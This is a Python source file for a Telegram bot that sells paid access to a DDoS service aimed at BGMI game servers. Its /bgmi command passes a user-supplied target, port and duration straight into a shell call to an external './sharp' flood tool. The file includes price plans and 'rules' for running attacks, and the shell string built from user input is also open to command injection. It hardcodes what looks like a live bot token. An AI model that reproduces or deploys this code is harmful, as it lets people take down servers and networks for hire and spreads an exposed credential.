-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathm.py
455 lines (393 loc) · 18.4 KB
/
m.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
#script by @ROYAL_HARAMI
import telebot
import subprocess
import datetime
import os
from keep_alive import keep_alive
keep_alive()
# insert your Telegram bot token here
bot = telebot.TeleBot('6838193855:AAHi1KDZv6Xgz_9yONP_dpF_TlrHcNQ03EU')
# Admin user IDs
admin_id = ["6512242172"]
# File to store allowed user IDs
USER_FILE = "users.txt"
# File to store command logs
LOG_FILE = "log.txt"
# Function to read user IDs from the file
def read_users():
try:
with open(USER_FILE, "r") as file:
return file.read().splitlines()
except FileNotFoundError:
return []
# Function to read free user IDs and their credits from the file
def read_free_users():
try:
with open(FREE_USER_FILE, "r") as file:
lines = file.read().splitlines()
for line in lines:
if line.strip(): # Check if line is not empty
user_info = line.split()
if len(user_info) == 2:
user_id, credits = user_info
free_user_credits[user_id] = int(credits)
else:
print(f"Ignoring invalid line in free user file: {line}")
except FileNotFoundError:
pass
# List to store allowed user IDs
allowed_user_ids = read_users()
# Function to log command to the file
def log_command(user_id, target, port, time):
admin_id = ["6512242172"]
user_info = bot.get_chat(user_id)
if user_info.username:
username = "@" + user_info.username
else:
username = f"UserID: {user_id}"
with open(LOG_FILE, "a") as file: # Open in "append" mode
file.write(f"Username: {username}\n𝐓𝐚𝐫𝐠𝐞𝐭: {target}\n𝐏𝐨𝐫𝐭: {port}\n𝐓𝐢𝐦𝐞: {time}\n\n")
# Function to clear logs
def clear_logs():
try:
with open(LOG_FILE, "r+") as file:
if file.read() == "":
response = "pehele se cleared. hai bacha ❌."
else:
file.truncate(0)
response = "khatam ✅"
except FileNotFoundError:
response = "No logs found to clear."
return response
# Function to record command logs
def record_command_logs(user_id, command, target=None, port=None, time=None):
log_entry = f"UserID: {user_id} | Time: {datetime.datetime.now()} | Command: {command}"
if target:
log_entry += f" | Target: {target}"
if port:
log_entry += f" | Port: {port}"
if time:
log_entry += f" | Time: {time}"
with open(LOG_FILE, "a") as file:
file.write(log_entry + "\n")
import datetime
# Dictionary to store the approval expiry date for each user
user_approval_expiry = {}
# Function to calculate remaining approval time
def get_remaining_approval_time(user_id):
expiry_date = user_approval_expiry.get(user_id)
if expiry_date:
remaining_time = expiry_date - datetime.datetime.now()
if remaining_time.days < 0:
return "Expired"
else:
return str(remaining_time)
else:
return "N/A"
# Function to add or update user approval expiry date
def set_approval_expiry_date(user_id, duration, time_unit):
current_time = datetime.datetime.now()
if time_unit == "hour" or time_unit == "hours":
expiry_date = current_time + datetime.timedelta(hours=duration)
elif time_unit == "day" or time_unit == "days":
expiry_date = current_time + datetime.timedelta(days=duration)
elif time_unit == "week" or time_unit == "weeks":
expiry_date = current_time + datetime.timedelta(weeks=duration)
elif time_unit == "month" or time_unit == "months":
expiry_date = current_time + datetime.timedelta(days=30 * duration) # Approximation of a month
else:
return False
user_approval_expiry[user_id] = expiry_date
return True
# Command handler for adding a user with approval time
@bot.message_handler(commands=['add'])
def add_user(message):
user_id = str(message.chat.id)
if user_id in admin_id:
command = message.text.split()
if len(command) > 2:
user_to_add = command[1]
duration_str = command[2]
try:
duration = int(duration_str[:-4]) # Extract the numeric part of the duration
if duration <= 0:
raise ValueError
time_unit = duration_str[-4:].lower() # Extract the time unit (e.g., 'hour', 'day', 'week', 'month')
if time_unit not in ('hour', 'hours', 'day', 'days', 'week', 'weeks', 'month', 'months'):
raise ValueError
except ValueError:
response = "Invalid duration format. Please provide a positive integer followed by 'hour(s)', 'day(s)', 'week(s)', or 'month(s)'."
bot.reply_to(message, response)
return
if user_to_add not in allowed_user_ids:
allowed_user_ids.append(user_to_add)
with open(USER_FILE, "a") as file:
file.write(f"{user_to_add}\n")
if set_approval_expiry_date(user_to_add, duration, time_unit):
response = f"User {user_to_add} added successfully for {duration} {time_unit}. Access will expire on {user_approval_expiry[user_to_add].strftime('%Y-%m-%d %H:%M:%S')} 👍."
else:
response = "abe babli gand sahi key dal."
else:
response = "pehele se janta is chutiye ko 🤦♂️."
else:
response = "Please specify a user ID and the duration (e.g., 1hour, 2days, 3weeks, 4months) to add 😘."
else:
response = "You have not purchased yet purchase now from:- @offx_sahil."
bot.reply_to(message, response)
# Command handler for retrieving user info
@bot.message_handler(commands=['myinfo'])
def get_user_info(message):
user_id = str(message.chat.id)
user_info = bot.get_chat(user_id)
username = user_info.username if user_info.username else "N/A"
user_role = "Admin" if user_id in admin_id else "User"
remaining_time = get_remaining_approval_time(user_id)
response = f"👤 Your Info:\n\n🆔 User ID: <code>{user_id}</code>\n📝 Username: {username}\n🔖 Role: {user_role}\n📅 Approval Expiry Date: {user_approval_expiry.get(user_id, 'Not Approved')}\n⏳ Remaining Approval Time: {remaining_time}"
bot.reply_to(message, response, parse_mode="HTML")
@bot.message_handler(commands=['remove'])
def remove_user(message):
user_id = str(message.chat.id)
if user_id in admin_id:
command = message.text.split()
if len(command) > 1:
user_to_remove = command[1]
if user_to_remove in allowed_user_ids:
allowed_user_ids.remove(user_to_remove)
with open(USER_FILE, "w") as file:
for user_id in allowed_user_ids:
file.write(f"{user_id}\n")
response = f"User {user_to_remove} gand pe laat 👍."
else:
response = f"User {user_to_remove} not found in the list ❌."
else:
response = '''Please Specify A User ID to Remove.
✅ Usage: /remove <userid>'''
else:
response = "You have not purchased yet purchase now from:- @offx_sahil 🙇."
bot.reply_to(message, response)
@bot.message_handler(commands=['clearlogs'])
def clear_logs_command(message):
user_id = str(message.chat.id)
if user_id in admin_id:
try:
with open(LOG_FILE, "r+") as file:
log_content = file.read()
if log_content.strip() == "":
response = "Logs are already cleared. No data found ❌."
else:
file.truncate(0)
response = "Logs Cleared Successfully ✅"
except FileNotFoundError:
response = "Logs are already cleared ❌."
else:
response = "You have not purchased yet purchase now from :- @offx_sahil ❄."
bot.reply_to(message, response)
@bot.message_handler(commands=['clearusers'])
def clear_users_command(message):
user_id = str(message.chat.id)
if user_id in admin_id:
try:
with open(USER_FILE, "r+") as file:
log_content = file.read()
if log_content.strip() == "":
response = "USERS are already cleared. No data found ❌."
else:
file.truncate(0)
response = "users Cleared Successfully ✅"
except FileNotFoundError:
response = "users are already cleared ❌."
else:
response = "ꜰʀᴇᴇ ᴋᴇ ᴅʜᴀʀᴍ ꜱʜᴀʟᴀ ʜᴀɪ ᴋʏᴀ ᴊᴏ ᴍᴜ ᴜᴛᴛʜᴀ ᴋᴀɪ ᴋʜɪ ʙʜɪ ɢᴜꜱ ʀʜᴀɪ ʜᴏ ʙᴜʏ ᴋʀᴏ ꜰʀᴇᴇ ᴍᴀɪ ᴋᴜᴄʜ ɴʜɪ ᴍɪʟᴛᴀ ʙᴜʏ:- @offx_sahil 🙇."
bot.reply_to(message, response)
@bot.message_handler(commands=['allusers'])
def show_all_users(message):
user_id = str(message.chat.id)
if user_id in admin_id:
try:
with open(USER_FILE, "r") as file:
user_ids = file.read().splitlines()
if user_ids:
response = "Authorized Users:\n"
for user_id in user_ids:
try:
user_info = bot.get_chat(int(user_id))
username = user_info.username
response += f"- @{username} (ID: {user_id})\n"
except Exception as e:
response += f"- User ID: {user_id}\n"
else:
response = "No data found ❌"
except FileNotFoundError:
response = "No data found ❌"
else:
response = "ꜰʀᴇᴇ ᴋᴇ ᴅʜᴀʀᴍ ꜱʜᴀʟᴀ ʜᴀɪ ᴋʏᴀ ᴊᴏ ᴍᴜ ᴜᴛᴛʜᴀ ᴋᴀɪ ᴋʜɪ ʙʜɪ ɢᴜꜱ ʀʜᴀɪ ʜᴏ ʙᴜʏ ᴋʀᴏ ꜰʀᴇᴇ ᴍᴀɪ ᴋᴜᴄʜ ɴʜɪ ᴍɪʟᴛᴀ ʙᴜʏ:- @offx_sahil ❄."
bot.reply_to(message, response)
@bot.message_handler(commands=['logs'])
def show_recent_logs(message):
user_id = str(message.chat.id)
if user_id in admin_id:
if os.path.exists(LOG_FILE) and os.stat(LOG_FILE).st_size > 0:
try:
with open(LOG_FILE, "rb") as file:
bot.send_document(message.chat.id, file)
except FileNotFoundError:
response = "No data found ❌."
bot.reply_to(message, response)
else:
response = "No data found ❌"
bot.reply_to(message, response)
else:
response = "ꜰʀᴇᴇ ᴋᴇ ᴅʜᴀʀᴍ ꜱʜᴀʟᴀ ʜᴀɪ ᴋʏᴀ ᴊᴏ ᴍᴜ ᴜᴛᴛʜᴀ ᴋᴀɪ ᴋʜɪ ʙʜɪ ɢᴜꜱ ʀʜᴀɪ ʜᴏ ʙᴜʏ ᴋʀᴏ ꜰʀᴇᴇ ᴍᴀɪ ᴋᴜᴄʜ ɴʜɪ ᴍɪʟᴛᴀ ʙᴜʏ:- @ROYAL_HARAMI ❄."
bot.reply_to(message, response)
# Function to handle the reply when free users run the /bgmi command
def start_attack_reply(message, target, port, time):
user_info = message.from_user
username = user_info.username if user_info.username else user_info.first_name
response = f"{username}, 𝐘𝐎𝐔𝐑 𝐀𝐓𝐓𝐀𝐂𝐊 𝐒𝐓𝐀𝐑𝐓𝐄𝐃 .🔥🔥\n\n𝐓𝐚𝐫𝐠𝐞𝐭: {target}\n𝐏𝐨𝐫𝐭: {port}\n𝐓𝐢𝐦𝐞: {time} 𝐒𝐞𝐜𝐨𝐧𝐝\n𝙈𝙀𝙏𝙃𝙊𝘿 :𝙀𝙆 𝘼𝙏𝙏𝘼𝘾𝙆 𝙆𝘼𝙏𝘼𝙈 𝙃𝙊𝙉𝙀 𝘿𝙊"
bot.reply_to(message, response)
# Dictionary to store the last time each user ran the /bgmi command
bgmi_cooldown = {}
COOLDOWN_TIME =0
# Handler for /bgmi command
@bot.message_handler(commands=['bgmi'])
def handle_bgmi(message):
user_id = str(message.chat.id)
if user_id in allowed_user_ids:
# Check if the user is in admin_id (admins have no cooldown)
if user_id not in admin_id:
# Check if the user has run the command before and is still within the cooldown period
if user_id in bgmi_cooldown and (datetime.datetime.now() - bgmi_cooldown[user_id]).seconds < COOLDOWN_TIME:
response = "You Are On Cooldown ❌. Please Wait 10sec Before Running The /bgmi Command Again."
bot.reply_to(message, response)
return
# Update the last time the user ran the command
bgmi_cooldown[user_id] = datetime.datetime.now()
command = message.text.split()
if len(command) == 4: # Updated to accept target, time, and port
target = command[1]
port = int(command[2]) # Convert port to integer
time = int(command[3]) # Convert time to integer
if time > 900:
response = "Error: Time interval must be less than 900."
else:
record_command_logs(user_id, '/bgmi', target, port, time)
log_command(user_id, target, port, time)
start_attack_reply(message, target, port, time) # Call start_attack_reply function
full_command = f"./sharp {target} {port} {time} 100"
process = subprocess.run(full_command, shell=True)
response = f"BGMI Attack Finished. Target: {target} Port: {port} Time: {time}"
bot.reply_to(message, response) # Notify the user that the attack is finished
else:
response = "✅ Usage :- /bgmi <target> <port> <time>" # Updated command syntax
else:
response = ("🚫 Unauthorized Access! 🚫\n\nOops! It seems like you don't have permission to use the /bgmi command. DM TO BUY ACCESS:- @offx_sahil")
bot.reply_to(message, response)
# Add /mylogs command to display logs recorded for bgmi and website commands
@bot.message_handler(commands=['mylogs'])
def show_command_logs(message):
user_id = str(message.chat.id)
if user_id in allowed_user_ids:
try:
with open(LOG_FILE, "r") as file:
command_logs = file.readlines()
user_logs = [log for log in command_logs if f"UserID: {user_id}" in log]
if user_logs:
response = "Your Command Logs:\n" + "".join(user_logs)
else:
response = "❌ No Command Logs Found For You ❌."
except FileNotFoundError:
response = "No command logs found."
else:
response = "You Are Not Authorized To Use This Command 😡."
bot.reply_to(message, response)
@bot.message_handler(commands=['help'])
def show_help(message):
help_text ='''🤖 Available commands:
💥 /bgmi : Method For Bgmi Servers.
💥 /rules : Please Check Before Use !!.
💥 /mylogs : To Check Your Recents Attacks.
💥 /plan : Checkout Our Botnet Rates.
💥 /myinfo : TO Check Your WHOLE INFO.
🤖 To See Admin Commands:
💥 /admincmd : Shows All Admin Commands.
Buy From :- @offx_sahil
Official Channel :- https://t.me/DotDotXy
'''
for handler in bot.message_handlers:
if hasattr(handler, 'commands'):
if message.text.startswith('/help'):
help_text += f"{handler.commands[0]}: {handler.doc}\n"
elif handler.doc and 'admin' in handler.doc.lower():
continue
else:
help_text += f"{handler.commands[0]}: {handler.doc}\n"
bot.reply_to(message, help_text)
@bot.message_handler(commands=['start'])
def welcome_start(message):
user_name = message.from_user.first_name
response = f'''❄️ᴡᴇʟᴄᴏᴍᴇ ᴛᴏ ᴘʀᴇᴍɪᴜᴍ ᴅᴅᴏs ʙᴏᴛ, {user_name}! ᴛʜɪs ɪs ʜɪɢʜ ǫᴜᴀʟɪᴛʏ sᴇʀᴠᴇʀ ʙᴀsᴇᴅ ᴅᴅᴏs. ᴛᴏ ɢᴇᴛ ᴀᴄᴄᴇss.
🤖Try To Run This Command : /help
✅BUY :- @offx_sahil'''
bot.reply_to(message, response)
@bot.message_handler(commands=['rules'])
def welcome_rules(message):
user_name = message.from_user.first_name
response = f'''{user_name} Please Follow These Rules ⚠️:
1. Dont Run Too Many Attacks !! Cause A Ban From Bot
2. Dont Run 2 Attacks At Same Time Becz If U Then U Got Banned From Bot.
3. MAKE SURE YOU JOINED https://t.me/royal_phonix_hub OTHERWISE NOT WORK
4. We Daily Checks The Logs So Follow these rules to avoid Ban!!'''
bot.reply_to(message, response)
@bot.message_handler(commands=['plan'])
def welcome_plan(message):
user_name = message.from_user.first_name
response = f'''{user_name}, Brother Only 1 Plan Is Powerfull Then Any Other Ddos !!:
Vip 🌟 :
-> Attack Time : 900 (S)
> After Attack Limit : 10 sec
-> Concurrents Attack : 5
Pr-ice List💸 :
Day-->80 Rs
Week-->400 Rs
Month-->1000 Rs
'''
bot.reply_to(message, response)
@bot.message_handler(commands=['admincmd'])
def welcome_plan(message):
user_name = message.from_user.first_name
response = f'''{user_name}, Admin Commands Are Here!!:
💥 /add <userId> : Add a User.
💥 /remove <userid> Remove a User.
💥 /allusers : Authorised Users Lists.
💥 /logs : All Users Logs.
💥 /broadcast : Broadcast a Message.
💥 /clearlogs : Clear The Logs File.
💥 /clearusers : Clear The USERS File.
'''
bot.reply_to(message, response)
@bot.message_handler(commands=['broadcast'])
def broadcast_message(message):
user_id = str(message.chat.id)
if user_id in admin_id:
command = message.text.split(maxsplit=1)
if len(command) > 1:
message_to_broadcast = "⚠️ Message To All Users By Admin:\n\n" + command[1]
with open(USER_FILE, "r") as file:
user_ids = file.read().splitlines()
for user_id in user_ids:
try:
bot.send_message(user_id, message_to_broadcast)
except Exception as e:
print(f"Failed to send broadcast message to user {user_id}: {str(e)}")
response = "Broadcast Message Sent Successfully To All Users 👍."
else:
response = "🤖 Please Provide A Message To Broadcast."
else:
response = "Only Admin Can Run This Command 😡."
bot.reply_to(message, response)
#bot.polling()
while True:
try:
bot.polling(none_stop=True)
except Exception as e:
print(e)